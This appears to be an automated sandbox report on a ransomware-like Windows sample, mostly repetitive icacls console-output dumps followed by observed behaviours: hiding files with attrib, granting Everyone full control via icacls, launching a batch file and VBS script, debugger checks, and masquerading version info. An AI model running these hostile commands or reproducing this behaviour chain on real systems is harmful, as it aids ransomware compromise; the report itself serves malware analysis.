Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...=#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...C#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...I#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...O#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...U#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...[#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...a#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...g#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...m#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...s#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...y#.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....#.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....#................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...9$.............................w......$.t.!.....T.!...!.....2.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...?$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...E$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...]$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...c$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...i$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$.............................w......$.t.!.....T.!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$.............................w......$.t.!.....T.!...!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$................................$.P.!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..................................`.........!.p.!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$..................................`.........!.p.!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....$..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....$..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@... %..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...&%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...,%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...F%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...L%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R%..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...X%..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...^%...............................%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...j%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...p%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v%..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...|%..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..............................(%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5..... ...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..............................8!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....%...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....%...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...$&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...*&..........................,.!......35......c.w..$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...0&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...6&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...<&..........................,.!......35......c.w..$...5.....6...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...B&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...H&..............................X!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...N&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...T&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...Z&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...`&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...f&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...l&...............................!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...r&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...x&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...~&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&.............................w......$...!.......!...!...........!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................L.......`...D...l.!...!...!............w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................8%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................(%$.l.!...Tw.....@..........X....#$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................!......35......c.w.#$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&............................!......35......c.w.#$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...............................%$.l.!...Tw.....@..........X...."$.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&...........................+@......35...!...!...$...5.....................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&...........................+@......35...!...!...$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&............................... $...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..........................,.!......35......c.w..$...5..... ...............
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....&..........................,.!......35......c.w..$...5...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....&..............................8!$...!...Tw.....@..........X.....$.....t.!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'.............................w......$...!.......!...!.....F.....!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'.............................w......$...!.......!...!.8.!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'..............................8!$...!...Tw.....@..........X.....!..... .!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....'..........................L.......`...D...l.!...!...!.....J......w..@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....'..........................L.......`...D...l.!...!...!...!...........@.....
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...n/.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...t/.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...z/..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@..../.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..../.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@..."0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...(0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...40.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...:0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...@0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...F0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...L0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...R0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...X0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...^0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...d0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...j0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@...p0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...v0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@...|0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....0.............................w....."$.<.!.......!.H.!...!.................
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0..............................0%$...!...Tw.....@..........X.....!.......!.
Source: C:\Windows\System32\icacls.exeConsole Write: ....................a.Uw..0.....P...`...@....0.............................w....."$.<.!.......!.H.!.........H.!.........
Source: C:\Windows\System32\icacls.exeConsole Write: ....................:. ...0.....P...`...@....1.............................w....."$.<.!.......!.H.!...!.................
PE file has an executable .text section and no other executable section
Source: 1.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini files
Source: C:\Windows\System32\cscript.exe, File read: C:\Users\luketaylor\Desktop\desktop.ini
Reads software policies
Source: C:\1.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processes
Source: unknown, Process created: C:\1.exe 'C:\1.exe'
Source: unknown, Process created: C:\Windows\System32\attrib.exe attrib +h .
Source: unknown, Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: unknown, Process created: C:\taskdl.exe taskdl.exe
Source: unknown, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Source: unknown, Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Source: unknown, Process created: C:\taskdl.exe taskdl.exe
Source: unknown, Process created: C:\taskdl.exe taskdl.exe
Source: unknown, Process created: C:\taskdl.exe taskdl.exe
Source: C:\1.exe, Process created: C:\Windows\System32\attrib.exe attrib +h .
Source: C:\1.exe, Process created: C:\Windows\System32\icacls.exe icacls . /grant Everyone:F /T /C /Q
Source: C:\1.exe, Process created: C:\taskdl.exe taskdl.exe
Source: C:\1.exe, Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 67541494599812.bat
Source: C:\1.exe, Process created: C:\taskdl.exe taskdl.exe
Source: C:\1.exe, Process created: C:\taskdl.exe taskdl.exe
Source: C:\1.exe, Process created: C:\taskdl.exe taskdl.exe
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\cscript.exe cscript.exe //nologo m.vbs
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\cscript.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Creates mutexes
Source: C:\1.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
Source: C:\1.exe, Mutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
PE file contains executable resources (Code or Archives)
Source: 1.exe, Static PE information: Resource name: XIA type: Zip archive data, at least v2.0 to extract
Sample file is different than original file name gathered from version info
Source: 1.exe, Binary or memory string: OriginalFilenamekbdlv.dllj% vs 1.exe
Source: 1.exe, Binary or memory string: OriginalFilenameLODCTR.EXEj% vs 1.exe
Source: 1.exe, Binary or memory string: OriginalFilenamediskpart.exej% vs 1.exe
Potential malicious VBS script found (suspicious strings)
Source: C:\Windows\System32\cmd.exe, Dropped file: SET ow = WScript.CreateObject("WScript.Shell")

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)
Source: 1.exe, Binary or memory string: Progman
Source: 1.exe, Binary or memory string: Program Manager
Source: 1.exe, Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\1.exe, System information queried: KernelDebuggerInformation
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\1.exe, Code function: 0_2_004021E9 strrchr,SetLastError,GetModuleHandleA,GetNativeSystemInfo,GetProcessHeap,HeapAlloc,memcpy,SetLastError,0_2_004021E9

Malware Analysis System Evasion:

Contains functionality to enumerate / list files inside a directory
Source: C:\taskdl.exe, Code function: 6_2_00401080 GetDriveTypeW,Sleep,swprintf,swprintf,FindFirstFileW,swprintf,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,wcslen,?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z,?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,FindNextFileW,FindClose,DeleteFileW,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB,DeleteFileW,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z,6_2_00401080
